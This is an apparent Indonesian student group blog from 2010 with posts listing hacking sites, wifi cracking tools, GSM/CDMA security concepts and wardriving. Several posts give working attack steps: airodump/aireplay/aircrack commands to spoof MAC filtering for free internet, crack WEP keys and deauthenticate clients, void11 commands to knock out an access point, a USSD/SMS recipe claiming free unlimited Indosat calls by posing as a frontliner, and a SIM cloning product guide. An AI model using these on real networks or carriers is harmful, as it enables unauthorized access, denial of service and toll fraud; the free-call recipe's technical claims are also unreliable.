Selasa, 27 April 2010

DAFTAR SITUS-SITUS HACKING

+Indonesia
-Jambihacker http://www.jambihackerlink.tk
-Jasakom http://www.jasakom.com
-Bosen http://www.bosen.net (udah gak aktif)
-balihacker http://www.balihackerlink
-bali http://balihacker.hp.ms
-solo http://solohackerlink.web.id
-Echo http://www.echo.or.id
-Hitam-putih http://www.hitam-putih.org (dah gak aktif)
-Yogya http://www.yogyafree.net (bisa di goggling)
-bali(2) http://balihack.or.id
-malang http://malanghack.net

+ Luar Negeri
-PacketStorm http://www.packetstormsecurity.org
-Phrack Magz http://www.phrack.org
-Securiteamhttp://www.securiteam.com
-SecurityFocus http://www.securityfocus.com
-SecurityReason http://www.securityreason.com
-HackThis Site http://www.hackthissite.com

Senin, 19 April 2010

SOFTWARE HACKING WIFI

1. NetStumbler

Netstumbler yang dikenal sebagai Jaringan Stumbleris suatu alat acilitates detecting dari Wireless Lans menggunakan Wireless 802.11b, 802.11a dan 802.11g WLAN standar yang berjalan pada sistem operasi dari microsoft Win98 – Win Vista, ada versi lain juga yang disebut Anothere Mini Stumbler yang menggunakan sistem operasi Windows CE. Untuk alat” kecil yang bisa di genggam.

Anda bisa mendapatkannya disini

2. Aircrack
Tercepat untuk WEP / WPA cracking tool

Aircrack adalah suite alat untuk 802.11a/b/g WEP dan WPA cracking. Hal ini dapat dilakukan dalam 40 sampai 512-bit password WEP dan hanya sekali dienkripsi paket” telah dikumpulkan. Aircrack juga dapat menyerang WPA 1 atau 2 jaringan dengan menggunakan metode lanjutan cryptographic kasar atau memaksa. Suite yang mencakup airodump (802,11 sebuah paket pengambil program), aireplay (802,11 sebuah paket suntikan program), aircrack (statis WEP dan WPA-PSK cracking), dan airdecap (decrypts WEP / WPA untuk pengambil file).

Anda dapat memperoleh Aircrack disini

3. Airsnort
802,11 WEP Encryption Cracking Tool

AirSnort adalah LAN nirkabel (WLAN) tool yang digunakan untuk merecover enkripsi password. Ia dikembangkan oleh shmoo kelompok pasif dan dioperasikan oleh pemantauan transmisi, komputasi enkripsi password akan dilakukan bila paket telah dikumpulkan. Anda mungkin juga akan tertarik dengan Airsnort ini.

Anda dapat memperoleh AirSnort disini

4. Cowpatty
Cowpatty ini adalah tools yang baik untuk memaksa cracking WPA-PSK, yang dianggap “WEP Baru” untuk Home Wireless Security. Program ini hanya mencoba a bunch dari berbagai pilihan dari kamus file untuk melihat dan menemukan apa yang didefinisikan sebagai Pre-Shared Key.

Anda dapat memperoleh Cowpatty disini

5. Asleap
Alat ini sangat bagus ketika menggunakan jaringan Leap. Alat ini dapat digunakan untuk mengumpulkan data otentikasi yang sedang lewat di jaringan, dan ini dapat di sniffed sehingga bisa di crack. Leap tidak melindungi otentikasi lainnya seperti “real” EAP, yang merupakan alasan utama mengapa Leap dapat mudah rusak.
Anda dapat memperoleh Leap disini

6. Ethereal
Ethereal digunakan oleh seluruh dunia Wind0s oleh kedua sistem operasi dan opensource, yang digunakan untuk mengatasi masalah, analisis, dan perangkat lunak protokol pembangunan, dan pendidikan. Memiliki semua fitur-fitur standar yang akan diharapkan dalam analisa protokol, dan beberapa fitur tidak dilihat pada setiap produk. Lisensi open source memungkinkan penambahan perangkat tambahan bagi anda” yang memiliki keahlian.

Anda dapat men-download Ethereal disini

referensi :http://www.topshareware.com/free-wifi-hacking-software/downloads/1.htm

KELOMPOK
Aji Nugroho 2007-53-198

Zuliana Putri Dewi 2007-53-202

Ahmad Teguh Susilo 2007-53-240

Lilik Chusnawati 2007-53-241

HACK AKTIVASI PULSA

hack aktivitas pulsa mentari
Mengingat banyaknya e-mail masuk ke mailbox IndoHack, akhirnya kami dengan besar hati membuka sebuah rahasia yang selama ini belum terungkap, yakni Menelepon dengan Pulsa Gratis khusus vendor Indosat (Mentari, IM3, dan Starone). Kami telah 6 bulan ke belakang, menelepon ke semua no. tanpa batas dan unlimited seperti halnya kami berlanganan kartu amodemen.

Tutorial ini semata-mata hanya untuk ilmu pengetahuan dan teknologi belaka. Dan kami atas nama IndoHack, meminta maaf sebesar-besarnya kepada Indosat (Mentari, IM3, dan Starone), jika karena terbukanya rahasia ini, pihak anda dirugikan. Tapi kami mengharapkan patching untuk server Indosat, agar kedepannya jauh lebih baik.

Awalnya bermula dari FREE TALK INDOSAT, dimana kartu Mentari (master) dapat menelepon GRATIS ke Mentari, IM3, mapun Starone dari pukul 00:00 – 05:00, tapi itupun tidak bertahan lama 5 menit putus dan kembali 5 menit putus, akhirnya jengkel pula, apalagi saat-saat romantis dengan si doi, kalau harus putus, putus, and putus bisa2 beneran PUTUS CINTA, lebih membahayakan bisa bunuh diri.

Lupakanlah soal FREE TALK, kita ubah menjadi UNLIMITED TALK dengan menelepon tanpa batas ke semua operator, dengan memanfaatkan kelemahan jaringan Indosat. Untuk staff Indosat, dengan level Manager ke atas, ada cara-cara khusus menekan *505*(kode rahasia)*(no. telepon)#, dan mereka dapat menelepon dengan seenak jidat mereka.

Tapi apakah anda tahu kode rahasianya, kami mengetahuinya!! Tapi kami tidak akan memberitahukan kepada Anda, karena kami terkait dengan norma dan etika hacking, bukan perusak atau penyebar tapi kami penyelamat. Jadi kami minta maaf, kalau kami tidak dapat memberitahukan kepada Anda, meski penuh mailbox kami dengan topik seperti itu, hingga mencapai 1028 email.

Persiapan awal untuk ber-UNLIMITED TALK :
• Tutorial / Artikel ini, jangan lupa kalau bisa di PRINT!
• Kartu Perdana BARU Mentari, IM3, atau Starone, kalo belum ada beli di konter HP murah kok.
• Kartu Simcard lama yang biasa digunain, harus Mentari, IM3 atau Starone.
• Daftar Nomor telepon yang mau di GRATISIN, siapin aja 4 dulu, atau lebih juga boleh karena bisa di update.
• Handphone segala tipe, asal jangan yang tua, agak ribet ditekennya, kalo bisa N73 lebih OK!
• Kopi Tubruk tanpa gula pake jahe, enak eoy! & Rokok Secukupnya, kalo bisa GG.
• Fungsi mata, tangan, dll masih baik untuk melakukan proses selanjutnya. Lets GO!!!

Langsung diracik menjadi satu UNLIMITED TALK!!
• Buka segel kartu Mentari, IM3 atau Starone yang baru, masukin di HP dan tekan 555 / 388 lalu OK, setelah ada tanda : SELAMAT DATANG... langsung anda matikan dan tekan *555* untuk Mentari/Starone, *388# untuk IM3, disana akan terlihat SALDO Anda, seperti : Pulsa Anda saat ini... Kartu anda telah aktif, kemudian tekan *202*(no . hp . kartu . perdana . yg . baru)#, misalnya *202*085823443861# lalu OK, maka akan Requesting / Meminta, lalu akan keluar Request Not Complete / Permintaan tidak lengkap, abaikan tidak menjadi masalah. Anda sudah tepat dan telah masuk kedalam jaringan UNLIMITED TALK karena kesalahan Indosat.
• Kirim SMS dengan tulisan : ACT JKB02077 lalu kirim ke 202. Anda seakan-akan harus mengunakan Frontliner indosat yang sudah ada, di internet banyak sekali, salah satunya JKB02077 anda dapat mengunakannya, hal ini hanya untuk menandakan bahwa anda Frontliner yang dapat masuk ke jaringan yang lebih dalam.
• Abaikan semua SMS yang masuk, ketik SMS kembali dengan menuliskan REG (no.hp.yg.mau.gratis.I) (no.hp.yg.lain.II) (no.hp.yg.lain.lagi.III) (no.hp.yg.lainya.lain.lagi.IV), misalnya saya ingin gratis telepon ke no. HP- 081538762991, 081537627651, 085683671652, 085827616751. Maka tulis SMS : REG 08153876299 081537627651 085683671652 085827616751
• Lalu kirim ke 6060, seketika anda akan mendapatkan SMS dimana sedang dalam PROSES, abaikan saja.
• Silahkan anda mencoba telepon, sebelumnya catat pulsa anda dan cek kembali, apakah berkurang. Cara menelepon mengunakan #31#(no.telepon) Ã OK!
• Untuk lebih baiknya, no. mentari, im3, dan starone Anda yang lama anda daftarkan pula menjadi frontliner dengan cara ketik SMS : ACT JKB02077 lalu kirim ke 202, setelah anda kirim, kemudian ketik SMS kembali, ketik : REG (no.hp.kartu.yg.baru) lalu kirim ke 6060. Dan nikmati kemudahannya, tapi anda harus meregistrasi mengunakan kartu Mentari, IM3, dan Starone yang baru sebagai MASTER!

Mengapa dapat menelepon tanpa mengurangi pulsa? Dari langkah2 yang kita lakukan, adanya kesalahan saat kartu perdana baru di aktifkan, belum masuk ke dalam database, dan akses sebagai frontliner masih terbuka lebar, dengan memanfaatkan service bug dari 202, kita dapat masuk tanpa sengaja ke webserver database dan menelepon dengan private number #31#(no.telepon) dengan gratis karena hide number masih terbuka dengan lebar dan bug 202 dikaitkan dengan private number akhirnya, kita dapat menelepon dengan GRATIS!

Jangan pernah takut untuk menghubungi siapapun, karena system Indosat tidak sebaik yang kita kira, belum ada logging, karena budget belum mencukupi, kemarin2 rencananya mau beli webserver dan memasang logging, tapi ternyata Cuma omong belaka, dipending sampai juni 2007, inilah yang membuat kami beberapa dari kami adalah supplier tetap dari indosat, tapi gagal tanpa alasan yang jelas, kami mengharapkan indosat dapat memperbaiki hal ini.

kelompok
Aji Nugroho 2007-53-198

Zuliana Putri Dewi 2007-53-202

Ahmad Teguh Susilo 2007-53-240

Lilik Chusnawati 2007-53-241

Hack Wifi

Membobol MAC Address Filtering:

1. Jalankan Live CD Distro Linux BackTrack2, masukkan username “root”, lalu masukkan password “toor”.

2. Setelah muncul prompt, ketikkan “startx”.

3. Setelah muncul desktop environment KDE, klik tombol “K” (di pojok kiri bawah). Pilih BackTrack  Radio Network Analysis -> 80211  Analyser  Kismet.

4. Lalu muncul window “Select Network Device”, pilih “wifi0”. Klik “OK”.

5. Muncul tampilan Kismet, secara otomatis Kismet akan mencari wireless client yang sedang aktif. Bila ditemukan wireless client yang aktif tetapi tidak terhubung dengan jaringan, maka akan muncul pesan “ALERT: Suspicious client 00:02:6F:37:08:20 - probing networks but never participating.”

6. Bila Kismet berhasil menemukan Access Point yang aktif, maka akan muncul pesan “Found IP 192.168.2.1 for slamet::00:0E:2E:C2:2C:0E via ARP”.
Keterangan:
slamet -> nama SSID
7. Tutup Kismet, lalu buka console untuk menjalankan tools scanning yang lain, yakni airodump.
Keterangan:
Bila kita menggunakan program scanning yang lain, biasanya program pertama akan membuat driver wireless kita “rusak”. Untuk dapat digunakan pada program yang kedua, kita perlu memperbaiki driver tersebut (dimatikan lalu dihidupkan kembali).

8. Cara memperbaiki driver, ketik:

#airmon-ng -> untuk mengecek interface yang tersedia.

Matikan driver “ath0” dan “ath1” dengan mengetik:
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila interface ath1 ada.

9. Mengaktifkan driver yang baru, ketik:
#airmon-ng start wifi0

10. Bila diketikkan perintah #iwconfig , maka muncul informasi “ath0” sudah aktif dengan Mode=Monitor.

11. Berikutnya, ketik #airodump-ng ath0

12. Dengan demikian maka kesimpulan bahwa dengan airodump mendapatkan hasil scanning MAC Address Client yang lebih cepat dibandingkan dengan menggunakan Kismet. Tetapi Client IP Address tidak bisa didapatkan, kecuali menggunakan Kismet.

13. Kita juga dapat menggunakan program K-MAC(atau anda bisa merubah MAC Address melalui regedit) yang di-install pada windows untuk merubah MAC-Address Wireless kita menjadi MAC-Address salah satu client yang terdaftar pada MAC Address Filtering.

14. Yang perlu dilakukan adalah mencari informasi MAC-Address client dengan mengunakan Kismet atau airodump, catat MAC-Address tersebut, lalu jalankan K-MAC di windows dan ubah MAC-Addressnya.
15. Setelah restart komputer/laptop anda, dan mulai berinternet gratis deh........



Menembus Pertahanan WEP Keys:
1. Jalankan BackTrack.
2. Reset driver wireless. Ketikkan:
#airmon-ng -> cek interface ath yang aktif
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila ath1 aktif
#airmon-ng start wifi0
3. Buka 3 buah console.
4. Console 1, ketikkan:
#airodump-ng ath0 -> scanning hotspot yang aktif.
#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0
Keterangan:
Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE
P Key.
--bssid -> MAC-Address dari AP yang akan di crack
-w target -> hasil capture ini akan disimpan di file yang namanya target
5. Console 2, ketikkan:
Untuk membantu menciptakan pengumpulan paket data
#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0
Keterangan:
-b -> MAC-Address dari AP.
-h -> MAC-Address dari client yang aktif terhubung ke AP.
6. Console 3, ketikkan:
Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.
#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0
Keterangan:

-c -> MAC-Address dari Client
-a -> MAC-Address dari AP
7. Setelah terkumpul paket data yang cukup, dilakukan cracking:
#aircrack-ng target*.cap
Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.


Melumpuhkan Client yang terhubung pada suatu AP:
1. Jalankan Live CD LinuxBackTrack 2.

2. Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.
3. Tutup Kismet, lalu buka console, ketikkan:
#airmon-ng stop ath0 -> untuk mematikan driver ath0
#airmon-ng stop ath1 -> untuk mematikan driver ath1
#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver

4. Jalankan scanning wireless menggunakan Airodump :
#airodump-ng ath0
5. Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:
#ifconfig ath0 up -> untuk mengaktifkan ath0
#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).

6. Langkah terakhir, kita lakukan serangan, ketikkan:
#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0
Keterangan:
Aireplay-ng -> program yang digunakan untuk melakukan de authentication
--deauth -> option untuk serangan de authentication

20 -> jumlah sending packet
00:0E:2E:C1:1E:83 -> MAC-Address komputer target
-a -> option untuk Access Point
00:0E:2E:C2:2C:0E -> MAC-Address Access Point
ath0 -> interface yang digunakan untuk menyerang


Melumpuhkan aksea point (AP)

Yang dibutuhkan adalah software void11(download di http://www.wlsec.net/void11) dan Kismet( kalau mau lebih mudah pakai Distro Linux Auditor), lalu hardware yang dibutuhkan Laptop dengan PCMCIA Wifi chipset Prism,
Setelah perangkat yang dibutuhkan siap, jalankan Kismet terlebih dahulu untuk melakukan scanning jaringan wifi, setelah anda mendapat info MAC address dari AP target melalui Kismet, ketikkan pada console:

# switch-to-hostap
# iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master
# void11_penetration wlan0 -D -t 1 -B 00:0E:2E:C2:2C:0E

keterangan : -D = debug
-t 1 = type serangan ke AP
-B = MAC Address AP target


-> Ingat pada waktu menjalankan instruksi serangan, Kismet masih aktif berjalan, jangan menutupnya, lalu tunggu beberapa saat, dan berikutnya.................. rontoklah AP target

kelompok
Aji Nugroho 2007-53-198

Zuliana Putri Dewi 2007-53-202

Ahmad Teguh Susilo 2007-53-240

Lilik Chusnawati 2007-53-241

CLONING SIM CARD

Pada kesempatan lain penulis mencoba untuk menjalankan kartu SIM Master dan SIM MAX pada perangkat PDA phone Palm Tungsten|W. Hari hasil uji coba penulis mendapati bahwa menu pemilihan nomor dari SIM Master tidak berjalan dengan sempurna pada Tungsten|W sehingga kita harus memilih nomor yang ingin diaktifkan melalui fasilitas PIN. Menu "STK - Switch Number" dari SIM MAX dapat berjalan dengan baik pada PDA phone ini.

SIM MAX pada palm tungsten|w
Saat kita mengamati komponen-komponen elektronik yang terpasang pada PCB (printed circuit board) dari SIM Master dan SIM MAX, dapat kita simpulkan bahwa kedua produk ini dibangun dari rangkaian dasar yang serupa, yaitu skematik reader/writer kartu SIM GSM yang diberikan oleh Dejan Kaljevic:




Bagian dalam reader/writer SIM Master




Bagian dalam SIM Master




Bagian dalam SIM MAX

Jika ditanya produk mana yang cenderung penulis pilih untuk penggunaan pribadi maka pilihan penulis jatuh pada SIM Master 3 dengan pertimbangan: kinerja kartu yang cepat saat dioperasikan di handphone, memanfaatkan format data yang dihasilkan oleh Sim Scan yang dibuat oleh Dejan Kaljevic, pilihan nomor aktif dapat dilakukan saat kita memasukkan nomor PIN, dan memiliki layanan garansi selama 1 tahun.

Tentang garansi SIM Master dari distributornya di Indonesia, penulis mengalami kejadian yang tidak begitu menggembirakan. Saat penulis menukar satu kartu penulis yang rusak di akhir tahun 2003, penulis menerima kartu pengganti dengan spesifikasi yang agak berbeda. Kartu yang rusak memiliki spesifikasi penyimpanan sebanyak 10 SMS dan 170 phonebook sedangkan kartu pengganti memiliki spesifikasi penyimpanan sebanyak 30 SMS dan 100 phonebook. Spesifikasi kartu pengganti yang penulis terima tidak sesuai dengan informasi yang menyatakan bahwa kartu SIM Master yang terbaru memiliki kapasitas penyimpanan sebanyak 40 SMS dan 250 phonebook. Kejadian ini membuat penulis curiga bahwa kartu SIM Master yang beredar di pasaran tidak memiliki spesifikasi yang pasti.

Berikut ini penulis sertakan pula perbandingan antara produk SIM Master dan SIM Max. Data perbandingan ini adalah data yang didapat berdasarkan spesifikasi produk yang ada di tangan penulis. Spesifikasi produk yang ada di pasar dapat berubah sewaktu-waktu.

Spesifikasi


SIM Master 3


SIM Max III

Kapasitas maksimal nomor GSM


8


12

Kapasitas penyimpanan SMS


10


40

Kapasitas phonebook


170


200

Kecepatan GSM card reader


9600 bps


9600 bps
19200 bps

Koneksi GSM card reader ke komputer pribadi (personal computer)


Serial port RS-232


Serial port RS-232

Pemilihan nomor GSM yang aktif


STK menu dan PIN selection


STK menu

Setiap kita mengubah nomor yang aktif melalui STK menu, PIN harus selalu dimasukkan


Tidak


Ya

Saat ponsel dimatikan dan dihidupkan kembali, nomor GSM yang aktif adalah


Nomor GSM pada entry ketujuh, kecuali dilakukan pemilihan dengan PIN selection


Nomor GSM yang terakhir kali aktif

Entry nomor GSM yang tampil pada STK menu dapat diubah sesuka kita


Tidak


Ya

Nomor GSM yang sudah ditulis dapat dihapus melalui program aplikasi yang disediakan oleh produsen


Tidak. Nomor GSM yang ingin dihapus harus ditulis ulang dengan data kosong (blank)


Ya

PUK untuk membuka kembali kartu yang terkunci karena kesalahan PIN


Tidak


Ya

Mendukung penggunakan Sim Scan yang dibuat oleh Dejan Kaljevic untuk proses pencarian KI


Ya


Reader/writer dapat digunakan oleh Sim Scan namun kita membutuhkan utility tambahan untuk mengubah format data Sim Scan ke format SIM Max. Sayangnya user interface utility yang disediakan oleh SIM Max ini didistribusikan dalam bahasa Mandarin.

Program aplikasi (utility) dapat di-download melalui web site produsen


Ya


Ya

User interface program aplikasi (utility) berbahasa Indonesia


Ya


Tidak

Panduan pengguna (help file)


Cukup lengkap dan detail


Terlalu sederhana

Panduan pengguna dalam bahasa Indonesia


Ya


Tidak

Dealer/distributor resmi di Indonesia


Ya


Tidak

Garansi 1 tahun di Indonesia


Ya


Tidak

Kinerja kartu saat digunakan di handphone


Cepat


Agak lambat

Penggunaan kedua produk cloning kartu SIM GSM ini secara umum tidaklah sukar. Proses cloning ini dapat dilakukan oleh siapa saja yang telah terbiasa menggunakan program aplikasi di komputer dan berani untuk menghubungkan sendiri perangkat tambahan seperti printer atau mouse ke port-nya masing-masing. Pastikan selalu menggunakan Sim Scan Dejan Kaljevic untuk melakukan proses scanning guna memperkecil resiko kerusakan kartu SIM GSM asli.

Apakah seluruh kartu SIM GSM yang beredar di Indonesia dapat di-clone? Jawabannya adalah: TIDAK. Dari pengalaman rekan Toshiro dari forumponsel.com, didapati bahwa kartu SIM GSM yang dikeluarkan oleh Satelindo yang memiliki kode CED dibelakang kartu SIM-nya tidak dapat di-scan oleh Sim Scan v2.01 namun kartu SIM GSM yang memiliki kode IM dibelakangnya, seperti yang tampak pada gambar di samping, dapat dengan mudah di-scan.

Proses cloning merupakan aktivitas yang sangat memakan waktu, proses scanning kartu SIM GSM rata-rata membutuhkan waktu lebih dari dua jam lamanya. Beberapa hal yang dapat kita lakukan untuk mencegah ter-cloning-nya kartu kita oleh pihak yang tidak bertanggung-jawab adalah:

1. Jangan pernah meminjamkan kartu SIM GSM kepada pihak lain dalam kurun waktu yang memungkinkan mereka untuk melakukan proses cloning.
2. Selalu aktifkan fungsi PIN yang ada pada kartu SIM.
3. Jika kehilangan kartu SIM GSM, segera laporkan kejadian tersebut ke penyedia jasa layanan seluler yang bersangkutan guna mendapatkan kartu SIM GSM baru.
4. Tertarik dengan nomor cantik? Berhati-hatilah jika ingin membeli kartu SIM bekas (second hand).
5. Jika ada pihak yang tidak dikenal secara pribadi penawarkan jasa untuk melaksanakan proses cloning, sebaiknya tolak tawaran ini. Proses cloning ini harus dilakukan sendiri.
6. Lakukan cloning hanya pada komputer milik pribadi atau komputer milik orang yang kita kenal secara pribadi.
7. Simpan baik-baik file .dat yang diperoleh dari hasil scanning. Ada baiknya untuk menyimpan file tersebut dalam bentuk kompresi (ZIP, RAR, atau lainnya) dan lindunglah dengan password yang panjang, katakanlah lebih dari 15 karakter.

Kemudahan melakukan cloning ini tidak akan bertahan lama karena lambat-laun para penyedia jasa telepon selular akan menggantikan kartu SIM GSM mereka dengan standar keamanan yang lebih sempurna seperti standar authentication algorithm COMP128v2 atau standar yang lebih baru lagi.

Demikianlah sharing Pengalaman Cloning Kartu SIM GSM ini. Semoga bermanfaat bagi mereka yang membutuhkannya.

sumber:
hadi@interdimension.org

referensi: http://sistem-keamanan-komputer.blogspot.com/2009/03/cloning-sim-card.html

KELOMPOK:
Aji Nugroho 2007-53-198

Zuliana Putri Dewi 2007-53-202

Ahmad Teguh Susilo 2007-53-240

Lilik Chusnawati 2007-53-241

SECURITY GSM DAN CDMA

Keamanan yang disediakan GSM

GSM menawarkan 3 aspek keamanan yaitu :

1.

Autentifikasi pengguna.

Yaitu kemampuan telepon selular untuk membuktikan apakah yang melakukan akses adalah pengguna yang sah.

2.

Kerahasiaan data dan sinyal.

Yaitu proses mengenkripsi pesan dan data yang di transmisikan.

3.

Kerahasiaan pengguna.

Yaitu sewaktu jaringan butuh identitas pelanggan atau selama proses autentifikasi IMSI (International Mobile Subscribe Identity) yang unik tidak dalam bentuk plainteks (sudah terenkripsi).

Layanan sistem keamanan GSM

Berdasarkan ETSI 02.09, terdapat empat layanan dasar sistem keamanan GSM, yaitu alokasi TMSI, autentikasi, penyandian (enkripsi/dekripsi data), serta identifikasi ME dan modul SIM.


Mekanisme sistem keamanan GSM

Sistem keamanan GSM berdasar pada pertukaran data antara HLR ( Home Location Register) dengan kartu SIM pada MS (Mobile Station atau telepon selular). Data yang ditukarkan diatas yaitu Ki, yaitu kunci sepanjang 128 bit yang digunakan untuk membuat 32 bit response yang disebut SRES, sebagai jawaban dari adanya random challenge yang disebut RAND, yang dikirim MSC melalui BTS kepada MS. Selain Ki data yang ditukarkan yaitu Kc, yaitu kunci sepanjang 64 bit yang digunakan untuk mengenkripsi pesan selama di udara antara BTS dengan MS. RAND, SRES yang dibangkitkan berdasarkan adanya RAND dan Ki, serta Kc yang juga dibangkitkan berdasarkan Ki disebut triplet, yang triplet tersebut telah dijelaskan di bagian makalah sebelumnya dalam proses autentifikasi.


Proses autentifikasi dimulai dengan adanya MS sign on MSC (Mobile Service Switching Center)

melalui BTS dengan mengirim identitas, kemudian MSC meminta triplet kepada HLR, lalu HLR memberi HLR kepada MSC. MSC mengirim RAND kepada MS, kemudian MS menghitung SRES dengan algoritma A3 menggunakan RAND yang diterima dan Ki yang terdapat pada SIM. Setelah itu MS mengirim SRES kepada MSC. MSC menerima SRES, lalu mencocokkan SRES dengan SRES dari triplet dari HLR ( HLR dapat menghitung SRES dariRAND yang HLR buat, karena HLR mengetahui semua Ki pada SIM).

Setelah proses autentifikasi selesai, MS membangkitkan kunci sesi, Kc, dengan algoritma A8 berdasarkan pada challenge dari MSC dan Ki. Begitu juga pada BTS yang berfungsi sebagai sarana komunikasi dengan BTS, menerima Kc dari MSC, sehingga proses komunikasi udara antara BTS dengan MS terenkripsi.

Setiap frame dienkripsi dengan keystream yang berbeda. Keystream ini di bangkitkan dengan algoritma A5. Algoritma A5 diinisialisasi dengan Kc dan jumlah frame yang akan dienkripsi, kemudian membangkitkan keystream yang berbeda untuk setiap frame. Ini berarti suatu panggilan dapat didekripsi jika penyerang mengetahui Kc dan jumlah dari frame. Kc yang sama digunakan selama MSC belum mengautentifikasi MS lagi.


Aspek Keamanan yang disediakan CDMA

CDMA menawarkan 3 aspek keamanan yaitu :

1. Autentifikasi

2. Proteksi

3. Anonimity

Autentifikasi

Autentifikasi merupakan proses dimana informasi dipertukarkan antara mobile station dan base station untuk mengkonfirmasikan identitas mobile station. Prosedur autentifikasi dibawa dari CDMA 2000. Base station memiliki Secret Shared Data (SSD) yang mana unik untuk setiap mobile station. Jika kedua-duanya yakni base station dan mobile station memiliki set SSD yang identik, prosedur autentifikasi diperkirakan dapat sukses. Prosedur autentifikasi signature (Auth_Signature) digunakan untuk menampilkan autentifikasi untuk mobile station tertentu. Parameter input berikut ini merupakan syarat dalam prosedur ini yakni:

• RAND_CHALLENGE

• ESN

• AUTH_DATA

• SSD_AUTH

• SAVE_REGISTERS

Autentifikasi ditampilkan menggunakan prosedur Unique Challenge Procedure. Dalam prosedur ini, base station membangkitkan nilai 24-bit value dan mentransmisikannya ke mobile station di Authentication Challenge Message. Tergantung pada catatan pesan, mobile station melaksanakan prosedur Auth_Signature dan field AUTHU dibangkitkan, yang mana telah dikirim ke base station melalui Authentication Challenge Response Message. Base station juga melaksanakan prosedur Auth_Signature menggunakan nilai yang disimpan secara internal, dan output dibandingkan dengan nilai AUTHU pada PDU yang diterima. Jika autentifikasi gagal, maka akses selanjutnya melalui mobile station ditolak dan prosedur updating SSD dapat dilakukan.


Proteksi ( Voice, Signal, Data Privacy)

Mobile menggunakan SSD_B dan algoritma CAVE untuk membangkitkan Private Long Code Mask (diturunkan dari nilai intermediate yang disebut Voice Privacy Mask , yang mana menggunakan sistim legacy TDMA), Cellular Message Encryption Algorithm (CMEA) key (64 bits), dan Data Key (32 bits). Private Long Code Mask memanfaatkan mobile dan jaringan untuk mengubah karakteristik Long code. Modifikasi Long code ini digunakan untuk penyadapan, yang mana menambahkan extra level privacy melalui CDMA interface udara. Private Long Code Mask tidak mengenkripsi informasi, hal ini mudah memindahkan nilai yang telah dikenal dengan baik dalam mengencode sinyal CDMA dengan nilai private yang telah dikenal baik untuk mobile maupun jaringan. Hal ini sangat ekstrim sulit untuk menyadap percakapan tanpa tahu Private Long Code Mask. Sebagai tambahan, mobile dan jaringan menggunakan key CMEA dengan algoritma Enhanced CMEA (ECMEA) untuk mengenkripsi pesan sinyal dikirim melalui udara dan di dekripsi informasi yang diterima. Kunci data terpisah, dan algoritma enkripsi disebut ORYX, digunakan oleh mobile dan jaringan untuk mengenkripsi dan mendekripsi lalu lintas data pada saluran CDMA.


Keunggulan Teknologi CDMA

Teknologi CDMA memiliki keunggulan dalam beberapa hal, yaitu :

1.

Teknologi CDMA didesain tidak peka terhadap interferensi. Di samping itu, sejumlah pelanggan dalam satu sel dapat mengakses pita spektrum frekuensi secara bersamaan karena mempergunakan teknik pengkodean yang tidak bisa dilakukan pada teknologi GSM. Kapasitas yang lebih tinggi untuk mengatasi lebih banyak panggilan yang simultan per channel dibanding sistem yang ada. Sistem CDMA menawarkan peningkatan kapasitas melebihi sistem AMPS analog sebaik teknologi selular digital lainnya. CDMA menghasilkan sebuah skema spreadspectrum yang secara acak menyediakan bandwith 1.250 KHz yang tersedia untuk masingmasing pemanggil 9600 bps bit rate.
2.

Dari segi keamanan panggilan, keamanan menjadi sifat dari pendekatan spread spectrum CDMA, dan kenyataannya teknologi ini pertama dibangun untuk menyediakan komunikasi yang aman bagi militer.
3.

Mereduksi derau dan interferensi lainnya.
4.

CDMA menaikkan rasio signal-to-noise, karena lebarnya bandwith yang tersedia untuk pesan. Efisinsi daya dengan cara memperpanjang daya hidup baterai telepon
5.

Salah satu karakteristik CDMA adalah kontrol power sebuah usaha untuk memperbesar kapasitas panggilan dengan mempertahankan kekonstanan level daya yang diterima dari pemanggil bergerak pada base station. Fasilitas kordinasi seluruh frekuensi melalui base-station base station.
6.

Sistem CDMA menyediakan soft hand-off dari satu base-station ke lainnya sebagai sebuah roaming telepon bergerak dari sel ke sel,melakukan soft handoff mengingat semua sistem menggunakan frekuensi yang sama.
7.

Fungsi spread-spectrum dan power-control yang memperbesar kapasitas panggil CDMA mengakibatkan bandwith yang cukup untuk bermacam-macam layanan data multimedia, dan skema soft hand-off menjamin :

*

Tidak hilangnya data.
*

Meningkatkan kualitas suara
*

Memperbaiki karakteristik cakupan yang dapat menurunkan jumlah sel.
*

Meningkatkan privacy dan security.
*

Menyederhanakan perencanaan sistim
*

Memerlukan daya pancar yang lebih rendah, sehingga waktu bicara ponsel dapat lebih lama.
*

Mengurangi interferensi pada sistim lain
*

Lebih tahan terhadap multipath.
*

Dapat dioperasikan bersamaan dengan teknologi lain (misal AMPS)

referensi: http://masbuchin.com/article/jenis+hacking+wireless.html
kelompok:
Aji Nugroho 2007-53-198

Zulia Putri Dewi 2007-53-202

Ahmad Teguh Susilo 2007-53-240

Lilik Chusnawati 2007-53-241

WARDRIVING

wardriving adalah kegiatan mengelilingi area tertentu, memetakan populasiwireless access point untuk tujuan statistik yang akan digunakan untuk memperoleh kesadaran akan permasalahan keamanan pada jaringan (wireless network). Federal Bureau of Investigation (FBI) menyatakan bahwa kegiatan scan acces point adalah kegiatan yang tidak illegal meskipun terjadi pencurian informasi.

Jaringan komputer adalah sebuah sistem yang terdiri atas komputer dan perangkat jaringan lainnya yang bekerja bersama-sama untuk mencapai suatu tujuan yang sama. Komputer pada jaringan dapat terhubung melalui media kabel, saluran telepon, gelombang radio, satelit, atau sinar infra merah.

Jaringan komputer dapat diklasifikasikan berdasarkan 4 kriteria, yaitu:
